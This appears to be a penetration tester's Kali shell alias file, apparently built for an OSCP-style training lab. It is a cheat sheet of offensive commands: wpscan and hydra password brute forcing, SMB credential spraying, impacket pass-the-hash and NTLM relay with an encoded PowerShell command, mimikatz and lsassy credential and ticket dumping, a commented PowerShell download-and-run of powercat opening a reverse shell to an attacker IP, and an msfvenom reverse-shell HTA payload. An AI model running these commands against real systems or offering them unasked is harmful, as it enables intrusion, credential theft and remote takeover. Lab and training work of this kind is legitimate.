#$DOMAIN = hackn.lab or medtech.com
#$DC = server01.hackn.lab or dc01.medtech.com
# alias example='(){ echo Your arg was $1. ;}'
export RHOST="192.168.237.120"
export LHOST="192.168.45.189"
export RPORT=""
export LPORT=""
export USERNAME=""
export PASSWORD=""

alias tjp='source /home/kali/.kali'
alias setrhost='(){/home/kali/setrhost.py "$1" && source /home/kali/.kali}'
alias setlhost='(){/home/kali/setlhost.py "$1" && source /home/kali/.kali}'
alias setrport='(){/home/kali/setrport.py "$1" && source /home/kali/.kali}'
alias setusername='(){/home/kali/setusername.py "$1" && source /home/kali/.kali}'
alias setpassword='(){/home/kali/setpassword.py "$1" && source /home/kali/.kali}'
alias setlport='(){/home/kali/setlport.py "$1" && source /home/kali/.kali}'
#alias setcwd='hash -d cwd=`pwd`'
alias setcwd='(){/home/kali/setcwd.py "$1" && source /home/kali/.kali}'
export cwd="/home/kali/Documents/Medtech2/192.168.248.121/exploit"
alias cwd='cd "$cwd"'
alias s='(){grep -i "$1" /home/kali/.kali --color}'
alias o='gedit /home/kali/.kali &'
alias pcwd='echo "$cwd"'
alias shells='(){ shells.sh $1 ;}'
alias gedit='(){gedit "$1" &}'
alias remove_neti='(){sudo ip link delete "$1"}'
##### PowerView ####
alias powerview="echo Get-NetUser \n Get-NetComputer \n Get-DomainShare (-CheckShareAccess) \n Get-NetUser -SPN | select serviceprincipalname \n Get-NetGroup -AdminCount | select name,memberof,admincount,member | fl"
#### WordPress ####
alias wps='wpscan --url http://"$RHOST"/wp/wp-login.php --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads=50'
#### RPC ####
alias rpcclient='(){rpcclient -U "" $RHOST "$@"}' # -queryusergroups <RID>,-querygroup <Group RID>,-queryuser <RID>
#### SMB ####
#enum4linux -a $ip
alias crackmapexec_spray='crackmapexec smb $RHOSTS'
alias crackmapexec_auto='echo "crackmapexec smb 192.168.200.75 -u "USERNAME" -p "$PASSWORD" -d corp.com --continue-on-success";echo "or --shares"' # can pass user/passw lists # <- to get shares
alias crackmapexec_checkNull='crackmpackexec smb "$RHOST" -u "" -p "" --users' #powerfull
# proxychains smbclient \\\\172.16.240.83\\Windows -U 'medtech.com\joe'
#### DNS ####
alias auto_dnsrecon='dnsrecon -d $ip /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.md'
alias dnsrecon_list='dnsrecon -d megacorpone.com -t axfr'

#### LDAP ### Finding Usernames
alias auto_ldap='(){ldapsearch -h "$1" -p "$2" -x -s base}'

#### Transfer Files #####
alias pysrv='python3 -m http.server'
alias iwr='(){echo iwr -uri http://"$LHOST":8000/"$1" -Outfile "$1"}'
alias startWebDav='(){wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/}'

#### Hydra #####
alias hydra_unk='(){hydra -L /usr/share/wordlists/dirb/others/names.txt -P /usr/share/wordlists/rockyou.txt -vV "$ip" "$1"}'
alias hydra_gethttp='(){hydra -l admin -P /usr/share/wordlists/rockyou.txt $ip http-get "$1"' # $1 = /webpage/
alias hydra_httppostform='(){echo "hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=^USER^&fm_pwd=^PASS^:Login failed. Invalid"}'

#### Impacket ####
alias imp-psexec='impacket-psexec -hashes 00000000000000000000000000000000:"$1" "$username"@"$ip"' # $1 = NT Hash
alias imp-wmiexec='impacket-wmiexec -hashes 00000000000000000000000000000000:"$1" "$username"@"$ip"' # $1 = NT Hash
alias imp-ntlmrelayx='impacket-ntlmrelayx --no-http-server -smb2support -t "$ip" -c "powershell -enc JABjAGwAaQBlAG5...."' #dir \\192.168.119.2\test -> on tgt machine to catch hash
alias imp-mssqlclient='impacket-mssqlclient "$username":"$1"@"$ip" -windows-auth' # $1 = share name
#alias mysql= -u root -p 'root' -h 192.168.50.16 -P 3306
#alias powershell_oneliner='(){powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://$ip:8000/powercat.ps1');
#powercat -c 192.168.45.245 -p 4444 -e powershell"
#### Ligolo-ng ####
alias ligolo_start='(){sudo ip tuntap add user `hostname` mode tun ligolo;sudo ip link set ligolo up;./proxy -selfcert}'
alias ligolo_client_echo='(){echo "./agent -connect $LHOST:11601 -ignore-cert &";echo "sudo ip route add _IP_ dev ligolo"}'
alias ligolo_listeners_echo='(){echo "listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:4444 --tcp";echo "listener_add --addr 0.0.0.0:9000 --to 127.0.0.1:4444 --tcp"}'
alias ligolo_magicip='echo "Local Ligolo Agent IP = 240.0.0.1"'

#### Mimikatz ####
alias mimikatz_print='echo .\mimikatz.exe \n privilege::debug \n sekurlsa::logonpasswords \n token::elevate \n lsadump::sam'

#### Get Usernames ####
alias get_kerb_users_nmap="(){nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=''}" # realm=medtech.com
#kerbrute= kerbrute bruteuser -d test.local passwords.txt john

#### lsassy ####
#lsassy -d hackn.lab -u pixis -p P4ssw0rd 192.168.1.0/24
alias lsassy_users='lsassy -d $domain -u $username -H $HASH $RHOST --users'
alias lsassy_pl_creds='lsassy -d hackn.lab -u $username -p $password $RHOSTS'
alias lsassy_procdump='lsassy -d hackn.lab -u $username -p $password dc01.hackn.lab -m procdump -O procdump_path=/opt/Sysinternals/procdump.exe'
alias lsassy_dumpert -d hackn.lab -u $username -p $password dc01.hackn.lab -m dumpert -O dumpert_path=/opt/dumpert.exe
alias lsassy_dumpertdll='lsassy -d hackn.lab -u $username -p $password dc01.hackn.lab -m dumpertdll -O dumpertdll_path=/opt/dumpert.dll'
# Kerberos tickets harvesting
alias lsassy_tickets='lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -K "/tmp/kerberos_tickets"'
# Cleartext credentials
alias lsassy_local_creds_txt='lsassy -u $username -p $password server01.hackn.lab' ## Local user
alias lsassy_domain_creds_txt='lsassy -d hackn.lab -u $username -p $password server01.hackn.lab' ## Domain user
#Pass-the-Hash
alias lsassy_pth='lsassy -d hackn.lab -u jsnow -H aad3b435b51404eeaad3b435b51404ee:38046f6aa4f7283f9a6b7e1575452109 server01.hackn.lab'
# LM:NT OR # lsassy -d hackn.lab -u jsnow -H 38046f6aa4f7283f9a6b7e1575452109 server01.hackn.lab
# aad3b435b51404eeaad3b435b51404ee
#### Get Hashes ####
alias getnpusers='(){python3 GetNPUsers.py test.local/ -dc-ip "$1" -usersfile usernames.txt -format hashcat -outputfile getnpusers_hashes.txt}'
#### Found Hash #######
alias smbhashlogin='smbclient \\\\$ip\\secrets -U Administrator --pw-nt-hash $HASH' # $HASH = nt hash
#smbclient //server/share --directory path/to/directory -c 'get file.txt'
#`net view \\\\dc01 /all`
#### Pivoting ####
# evil-winrm -i 10.10.10.1 -u john -H c23b2e293fa0d312de6f59fd6d58eae3
##### Runas #####
#EoP - Runas
#Use the cmdkey to list the stored credentials on the machine.

#### Windows PrivEsc ####
alias printPrintSpoofer='echo ".\PrintSpoofer64.exe -i -c cmd"'
alias powerup='echo ". .\PowerUp.ps1 ; Invoke-AllChecks"'

#### msfvenom ####
# HTML App payload
alias msfvenom_hsa='echo "msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.244 LPORT=443 -f hta-psh > shell.hta"'






